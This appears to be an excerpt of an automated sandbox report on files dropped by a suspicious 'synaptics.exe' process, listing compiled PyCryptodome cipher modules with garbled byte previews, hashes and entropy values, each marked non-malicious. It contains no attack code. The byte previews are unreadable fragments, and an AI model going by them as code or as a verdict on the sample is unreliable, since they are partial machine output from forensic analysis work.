                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.S.).a.....Module's constants for the modes of operation supported with Single DES:..:var MODE_ECB: :ref:`Electronic Code Book (ECB) <ecb_mode>`.:var MODE_CBC: :ref:`Cipher-Block Chaining (CBC) <cbc_mode>`.:var MODE_CFB: :ref:`Cipher FeedBack (CFB) <cfb_mode>`.:var MODE_OFB: :ref:`Output FeedBack (OFB) <ofb_mode>`.:var MODE_CTR: :ref:`CounTer Mode (CTR) <ctr_mode>`.:var MODE_OPENPGP: :ref:`OpenPGP Mode <openpgp_mode>`.:var MODE_EAX: :ref:`EAX Mode <eax_mode>`......N)..._create_cipher)...byte_string)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptrz.Crypto.Cipher._raw_desa..... int DES_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);. int DES_encrypt(const vo
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6196
                                                                                                                                                                                                            Entropy (8bit):5.265726679088953
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:r3Pz+cF8LjRVdNkIOMwoYRc/2QlAeiPTiC6TtLAvE4YMxbulb5ac:H+pB8MQ1aqPTi/tcfYSbwAc
                                                                                                                                                                                                            MD5:B31A8CAEE5AAE11C38A9446A73F48E49
                                                                                                                                                                                                            SHA1:BBE58F0CEF31ED7973C0D5C01191936C7731A946
                                                                                                                                                                                                            SHA-256:D50C669F9E370E1E947AD63953B1A4DE2FF6B4FD6ABE57F8F54AC08B62E24AE4
                                                                                                                                                                                                            SHA-512:7E2E1226D7D90E7C767F28F9E0942803037C1AE2E841009AFA864DCD56807FE71B668987618C30EC51521D5E76038CA87E774760CDACB2E72992A5FDE668633E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.S.).a.....Module's constants for the modes of operation supported with Triple DES:..:var MODE_ECB: :ref:`Electronic Code Book (ECB) <ecb_mode>`.:var MODE_CBC: :ref:`Cipher-Block Chaining (CBC) <cbc_mode>`.:var MODE_CFB: :ref:`Cipher FeedBack (CFB) <cfb_mode>`.:var MODE_OFB: :ref:`Output FeedBack (OFB) <ofb_mode>`.:var MODE_CTR: :ref:`CounTer Mode (CTR) <ctr_mode>`.:var MODE_OPENPGP: :ref:`OpenPGP Mode <openpgp_mode>`.:var MODE_EAX: :ref:`EAX Mode <eax_mode>`......N)..._create_cipher)...byte_string..bchr..bord..bstr)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_tz.Crypto.Cipher._raw_des3a..... int DES3_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6960
                                                                                                                                                                                                            Entropy (8bit):5.306197600183762
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:g5y77I5xO5Xqk0mul9jUAWWiD+wtDMgMzfEB1RZYVrdKlHbgKqkfzBA/CF:H7FFFpiMtQg/1g1dmrFf6qF
                                                                                                                                                                                                            MD5:81636EECE93E50AD0D15F435A61D312D
                                                                                                                                                                                                            SHA1:E6376B6E50086F9CF5DADC5F308B28D364063947
                                                                                                                                                                                                            SHA-256:8A60D759C5EFC60C2EEC1D5E31A5E9AAEA3FD48C2264457C8E9AB859FC110C96
                                                                                                                                                                                                            SHA-512:E8527336059CEAECE4E407344812E68ADE0092DE5CF25F0D29DF36BB624AF5BEEB1E1198DFFE71FD42BC7B66AB7BA9543F47DC4C8B526AAB37E786E0F8526457
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gO".......................@...s|...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d...Z.d.d.d...Z.d.S.)......)...MGF1N)..._copy_bytes)...ceil_div..bytes_to_long..long_to_bytes)...strxor)...Random.....)...oaep_decodec....................@...s8...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...PKCS1OAEP_CipherzXCipher object for PKCS#1 v1.5 OAEP.. Do not create directly: use :func:`new` instead.c........................sN...|..._.|.r.|..._.n.t.j.j..._.|.r.|..._.n...f.d.d....._.t.d.d.|....._.|..._.d.S.).a....Initialize this PKCS#1 OAEP cipher object... :Parameters:. key : an RSA key object. If a private half is given, both encryption and decryption are possible.. If a public half is given, only encryption is possible.. hashAlgo : hash object. The hash function to use. This can be a module under `Crypto.Hash`. or an existing h
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1701
                                                                                                                                                                                                            Entropy (8bit):5.41346800473241
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:NozLMJbLqGllz8RRygl2KGLtLaLaLLLLv+rLALiLLxLJLOfi:NozCbLqylz8Rsg1Ifuai
                                                                                                                                                                                                            MD5:ACA025064F751C120733CAC69422668F
                                                                                                                                                                                                            SHA1:7ABBC40CD554DC11BC9D82B2647EF5F851F1B3A3
                                                                                                                                                                                                            SHA-256:425941BD23587B75F0478E8BD93729CFEC5B1DC7308AA3DE413FF3FC9CFB48D9
                                                                                                                                                                                                            SHA-512:FAF542D8FC30967F7EE821D6092CA47BB5A2ABA3C3763D2B6808328D32B2CEB4119DC7460D9AC30F0303A298615636D2C085BF2A4671227EB1B2CAAF57E13DEF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gk........................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.e.e.e.e.e.d...Z.e.e.e.e.d...Z.d.d...Z.d.S.)......N)..._create_ecb_cipher)..._create_cbc_cipher)..._create_cfb_cipher)..._create_ofb_cipher)..._create_ctr_cipher)..._create_openpgp_cipher)..._create_ccm_cipher)..._create_eax_cipher)..._create_siv_cipher)..._create_gcm_cipher)..._create_ocb_cipher)....................................).....................c....................O...s....|.|.d.<.t.t...}.|...d.d...r.|...t.....|.|.v.r.t.d.....|.r^|.d.v.r2t.|...d.k.r+t.d.....|.d...|.d.<.n,|.d.v.rGt.|...d.k.r@t.d.....|.d...|.d.<.n.|.d.k.rVt.|...d.k.rUt.d.....n.|.d.k.r^t.d.....|.|...|.f.i.|.....S.).N..keyZ.add_aes_modesFz.Mode not supported).r....r....r....r....r....r....z Too many arguments for this moder......nonce).r....r....r....r....Z.IVr....z%IV is not meaningful for the ECB mode)...dict.._modes..pop..up
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7479
                                                                                                                                                                                                            Entropy (8bit):5.150278146171232
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:2Y6kvwbQ9XIHJEgsA4nx3ZzhSpR5esIDGnt834mGvWcsQNqC/Y8HvGBt83425phX:UbJHrt4x3Zq8smGtU4w1MGnU44Kt0qOp
                                                                                                                                                                                                            MD5:B40D84315BB2A3BEBB7B27176F113117
                                                                                                                                                                                                            SHA1:57C5261582F761F86386C555381FE41E3CF478B6
                                                                                                                                                                                                            SHA-256:8DA713951F3D223FB4231369F9027224A5CA94EEE6FB7BE25775836AA0DA345A
                                                                                                                                                                                                            SHA-512:10ECC97D45769C5014BA03D3563BD53E75C0F8111AC4AF4C7A547938394960F9091FD1922F955D9DE3F91B9C7752C786484FD45D6DD71C2125C7A9B2BDD727A8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.+.......................@...sp...d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z'.Ciphertext Block Chaining (CBC) mode....CbcMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Crypto.Cipher._raw_cbca..... int CBC_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. void **pResult);. int CBC_encrypt(void *cbcState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int CBC_decrypt(void *cbcState,. const uint8_t *in,. uint8_t *out,.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17954
                                                                                                                                                                                                            Entropy (8bit):5.290212994595442
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:tLq/qgUMlQiMS1I48juzC8Y2tMlx7vXyqE:tLSQM6jQMb7/yV
                                                                                                                                                                                                            MD5:3FE27BC51CA0C19625F77129502E38D3
                                                                                                                                                                                                            SHA1:895EFC83C1D313DBAB12F9E73E6F756AA1E17D93
                                                                                                                                                                                                            SHA-256:6D6FBB648A5DF441133D6D889F2E0F8A7A71F87657F1239A3FD8C3C4B4CDDB6A
                                                                                                                                                                                                            SHA-512:A8B4AF40F79372ED5866F348D04F74A2AC7F348E3114CE37A8944E67D1DE112C75516A226D8C01767DB74224A2CF599E688D55F6805ACEA46EA57E8560F35C30
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.a.......................@...s....d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d...Z.e.d.d.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z".Counter with CBC-MAC (CCM) mode....CcmMode.....N)...unhexlify)...byte_string..bord.._copy_bytes)...is_writeable_buffer)...strxor)...long_to_bytes)...BLAKE2s)...get_random_bytesc....................K...s....t.d.d.|...S.).N..Enum..)...type).Z.enumsr....r.....TC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Cipher\_mode_ccm.py..enum3...s......r..............)...NOT_STARTED..PROCESSING_AUTH_DATA..PROCESSING_PLAINTEXTc....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d.d...Z.d!d.d...Z.d!d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d!d.d...Z.d!d.d...Z.d.S.)"r....a....Counter with CBC-MAC (CCM)... This is an Authenticated Encryption with Associated Data (`AEAD`_) mode.. It provides both confidentiality and authenticity... The header
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7801
                                                                                                                                                                                                            Entropy (8bit):5.113374464058358
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:No6kvf/G8HDxEpuPnxEZYhB/PsCIgGGt834mGPMsQNPx/g8H+G0t834U5pptYCcX:o3xEuxEZY8CJGkU4ma5GaU4mx4DbKq+E
                                                                                                                                                                                                            MD5:BDE675FDBB284A9EADF0B8ED468C70B4
                                                                                                                                                                                                            SHA1:8BF0ED344E7B805A02BF66E92922067A0D4D4E9A
                                                                                                                                                                                                            SHA-256:1CEA9F0292A196ABAE68A7A26102BAF1BFC1FACF3849A41A813736B4E89677A3
                                                                                                                                                                                                            SHA-512:E5E759A32DC83B92E540B54B643C7D4100485D492B82D086FD8717EDB4980E0C6552F77FD711984FE5F995AA14A6408E9DF117CC83DB0D442F26747E9647A508
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.+.......................@...sp...d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z..Counter Feedback (CFB) mode....CfbMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Crypto.Cipher._raw_cfba .... int CFB_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. size_t segment_len, /* In bytes */. void **pResult);. int CFB_encrypt(void *cfbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int CFB_decrypt(void *cfbState,.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10999
                                                                                                                                                                                                            Entropy (8bit):5.107515729014792
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:77GD6nkH7cxiM16TPyx8ssmGrPU4uOGrNU4XrwSkcji+Gb:7amnGSQe80MTuOyTXMSkmi+0
                                                                                                                                                                                                            MD5:F2C4106517FEA8D3E72ACB0216A05854
                                                                                                                                                                                                            SHA1:D4750D0B7D46066D7BA74B691C4151AE8EEDFBDF
                                                                                                                                                                                                            SHA-256:93325AFE4B60A81A2B8178570119919C1197A4B674C20D8DB659484C69AA5322
                                                                                                                                                                                                            SHA-512:024843F24D1CFFFD696D408D8EBE9072439BBD87C2410D68D2E11C517F9343CD1945276F3BBAD865EA39F95F10D4065F0B68B9680B88AC681DACF109D10FAB48
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gM?.......................@...s....d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z..Counter (CTR) mode....CtrMode.....N)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytes)..._copy_bytes..is_native_int)...long_to_bytesz.Crypto.Cipher._raw_ctra..... int CTR_start_operation(void *cipher,. uint8_t initialCounterBlock[],. size_t initialCounterBlock_len,. size_t prefix_len,. unsigned counter_len,. unsigned littleEndian,. void **pResult);. int CTR_encrypt(void *ctrState,.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12285
                                                                                                                                                                                                            Entropy (8bit):5.164330386138498
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:WsVawXqNRGW1vCM4PBrU4/4DwU4X3Rz/AfrRWDL/773uewFjp3xWmk1:DawXq/L4M4lTwwTXp/AVeLT732L071
                                                                                                                                                                                                            MD5:BCC4007F60C216415D4C1925DA76BF3E
                                                                                                                                                                                                            SHA1:6CE4EA0AC20873ECAF571BBD443B1BD3A62CA239
                                                                                                                                                                                                            SHA-256:8B9A465ABD09E1D905D21778DA533E638989CFE44F0AFFA0BACD8B24D38C646F
                                                                                                                                                                                                            SHA-512:2B7B1A2799ACAEB363CEFC9F84FD7DF01067C67A680D068849421274954E20CC12608BF2B6BEBECD311CFDD695FB87F8682495EBA6BB5E28881C08F880B5EE74
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.:.......................@...s....d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.d...Z.d.S.).z..EAX mode....EaxMode.....N)...unhexlify)...byte_string..bord.._copy_bytes)...is_buffer)...strxor)...long_to_bytes..bytes_to_long)...CMAC..BLAKE2s)...get_random_bytesc....................@...sh...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).r....a....*EAX* mode... This is an Authenticated Encryption with Associated Data. (`AEAD`_) mode. It provides both confidentiality and authenticity... The header of the message may be left in the clear, if needed,. and it will still be subject to authentication... The decryption step tells the receiver if the message comes. from a source that really knowns the secret key.. Additionally, decryption detects if any part of the message -. including the header - has been modified
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5828
                                                                                                                                                                                                            Entropy (8bit):5.1075576042761845
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:ikFv6kvV9AtXEHlhfKx7lhL9FeaqBP6sQLRdJ98HJm3qc5pHIeOD:ikH9pHlhM7vekL96mxsD
                                                                                                                                                                                                            MD5:FDEA3B550CC0E2D5A6569E85641C0553
                                                                                                                                                                                                            SHA1:FE1A41A7905530CA89A908E6AD11945C14655D5D
                                                                                                                                                                                                            SHA-256:18782E2A21671BEB01E4A9A401BA5CE9B77FD22580E4204B494B4BF7B849EF16
                                                                                                                                                                                                            SHA-512:E689977525A31E125E493CE109B9D4C3DE8BD28268FD52BF81BADCC85DFB3027B14EEE188BB1168EA702FBB555ECEC8256F9E64FA2198C148EAB1BBDBD660329
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gQ!.......................@...sX...d.Z.d.g.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z".Electronic Code Book (ECB) mode....EcbMode.....)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_bufferz.Crypto.Cipher._raw_ecbak.... int ECB_start_operation(void *cipher,. void **pResult);. int ECB_encrypt(void *ecbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int ECB_decrypt(void *ecbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int ECB_stop_operation(void *state);. c....................@...s,.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17082
                                                                                                                                                                                                            Entropy (8bit):5.335449394593351
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:8H+RW9/ScqbkrPM4JjaTlTbIl67Wa+7l9A:8ew9/Zw4c7Fc9A
                                                                                                                                                                                                            MD5:765665F5ED29C64E5447DB0985E30B3E
                                                                                                                                                                                                            SHA1:DF9BF9308D5C6C727AFB3DA442C32ABF09B58BF9
                                                                                                                                                                                                            SHA-256:F1A94C81490197CEAEF4D6828FC1A23FE1949270BA6DED951D3787C825065578
                                                                                                                                                                                                            SHA-512:D0520F2B6F3B7880ABAE658E3CE1773C9839115E6B28DC141890B8545361809F6994B3BE85C5FB7B3AB2DDDFB497868DD20CA28888FD51C68314C5A2DC53DD89
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.U.......................@...s....d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d.d...Z.d.d...Z.e...Z.d.d...Z.e...Z.G.d.d...d.e...Z d.d...Z!e!d.d.d...Z"G.d.d...d.e...Z#d.d...Z$d.S.).z..Galois/Counter Mode (GCM)....GcmMode.....)...unhexlify)...bord.._copy_bytes)...is_buffer)...long_to_bytes..bytes_to_long)...BLAKE2s)...get_random_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr)..._cpu_featuresa`.... int ghash_%imp%(uint8_t y_out[16],. const uint8_t block_data[],. size_t len,. const uint8_t y_in[16],. const void *exp_key);. int ghash_expand_%imp%(const uint8_t h[16],. void **ghash_tables);. int ghash_destroy_%imp%(void *ghash_tables);.c........................sl...d.d.l.m.}...d.}.|.d.|...}.z.....f.d
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14664
                                                                                                                                                                                                            Entropy (8bit):5.243149888646542
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:5qHGdezRprM0R4K/eWAe4hvDCxH5DBbaZ0dQ:5sGde/MMF2ygOZ5aZ0dQ
                                                                                                                                                                                                            MD5:4DD31D2EC60B500FC4C60E41F5725187
                                                                                                                                                                                                            SHA1:FEEFCB16321546E1183B3A84076E388200B83EEE
                                                                                                                                                                                                            SHA-256:C2C433F2A2511DD4D2461D124AD6F90D763A62555CF69B3E3E2B7881447BDC69
                                                                                                                                                                                                            SHA-512:BCFD7C274FD0A232BA975037FA0964F91CFD271F6D8E0813718111D2CE640939731224A80DB41386B3EB4298AE2B3EF87ADAAE23151C52F783D2925D4AEB21E6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.O.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).ah....Offset Codebook (OCB) mode...OCB is Authenticated Encryption with Associated Data (AEAD) cipher mode.designed by Prof. Phillip Rogaway and specified in `RFC7253`_...The algorithm provides both authenticity and privacy, it is very efficient,.it uses only one key and it can be used in online mode (so that encryption.or decryption can start before the end of the message is available)...This module implements the third and last variant of OCB (OCB3) and it only.works in combination with a 128-bit block symmetric cipher, like AES...OCB is patented in US but `free licenses`_ exist for software implementations.meant for non-military purposes...Example:. >>> from Crypto.Cipher import AES. >>> from Crypto.Random import get_random_bytes. >>>. >>> key = get_ran
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7370
                                                                                                                                                                                                            Entropy (8bit):5.08916413629736
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9A6kv9jQvHHq12nxIN3hSpA5esIUGGt834mGPMsQN7t/z8HaGTvt834+5pcRJ6Xn:CyHqAxIt8s9GkU4yZlGTVU4JCoq/1l
                                                                                                                                                                                                            MD5:C4755D6AF52974BC6C43A55166EE512E
                                                                                                                                                                                                            SHA1:8154C54ECA8A337551C9182DDD19C634E1940DE9
                                                                                                                                                                                                            SHA-256:5083CC83F81378F4089DA1C1648C98B0B2BB0990E3A35794F9BDB172CFD20252
                                                                                                                                                                                                            SHA-512:D47D94467BDAD880BDB56B7FFFA56DB8C736C210A3BD4E7B52F718CB4B460B57B0FD125417617E2E1D76844882253023728453CBB1D8C9E2EB539E4C7AD4F9D8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.(.......................@...sp...d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z..Output Feedback (CFB) mode....OfbMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Crypto.Cipher._raw_ofba..... int OFB_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. void **pResult);. int OFB_encrypt(void *ofbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int OFB_decrypt(void *ofbState,. const uint8
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4826
                                                                                                                                                                                                            Entropy (8bit):5.242025355903295
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:MV8N+A+Xoyi2Kt834mGPUGt8340y9nxBX4o7UIDFI:MU+A+dYU44kU4H9xxUIZI
                                                                                                                                                                                                            MD5:96E92437E699510D46B95BE5FA860B6F
                                                                                                                                                                                                            SHA1:7CC41D47229EC4BB1F34CC3D72BBF80F0BED0533
                                                                                                                                                                                                            SHA-256:5A05289B791F01A7B481FC6122B1FF2EDDEC73A2E988D58777EFCF38DB1C22F3
                                                                                                                                                                                                            SHA-512:244080DD464A142D4E9783B57FD871E69F75308F5A292FDDC501D0A7379A175230869B1A26BBE50E8E8B6FD364D7B6DB9C62422A01E35C9AE792025F4289C2EC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g[........................@...s>...d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.d...Z.d.S.).z..OpenPGP mode....OpenPgpMode.....)..._copy_bytes)...get_random_bytesc....................@...s(...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.).r....az...OpenPGP mode... This mode is a variant of CFB, and it is only used in PGP and. OpenPGP_ applications. If in doubt, use another mode... An Initialization Vector (*IV*) is required... Unlike CFB, the *encrypted* IV (not the IV itself) is. transmitted to the receiver... The IV is a random data block. For legacy reasons, two of its bytes are. duplicated to act as a checksum for the correctness of the key, which is now. known to be insecure and is ignored. The encrypted IV is therefore 2 bytes. longer than the clean IV... .. _OpenPGP: http://tools.ietf.org/html/rfc4880.. :undocumented: __init__. c....................C...s....|.j.|._.d.|._.|.j.|.|.j.f.d.|.j...|.j.d...d...|.....}.t.d.d.|...}.t.|...|.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11827
                                                                                                                                                                                                            Entropy (8bit):5.2510371455888585
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:OLqjzBGjN4xYwBKXrEApsGdDGdkT+WIp6hW97iuA4al45B3xQrBBQ:gq45XwBarEWfYiIpAe7JaG81m
                                                                                                                                                                                                            MD5:353F39229EBEF79A41874A9CBEDE71A1
                                                                                                                                                                                                            SHA1:F94E563C78FB0F9036ABBD904670F02879CF710B
                                                                                                                                                                                                            SHA-256:3FBDF1AA4873D156018BB930FC6F5264F5D8700746C4410D34BD1746FEF05944
                                                                                                                                                                                                            SHA-512:8E8E7D1C4B2A10ECD467787B805A90D0244A643985D4A00E0FF69EBA431F513EED2CDB6F3AF6319584D587AA25D3697AF3A522E5972D4E8585B4D482EFB72887
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
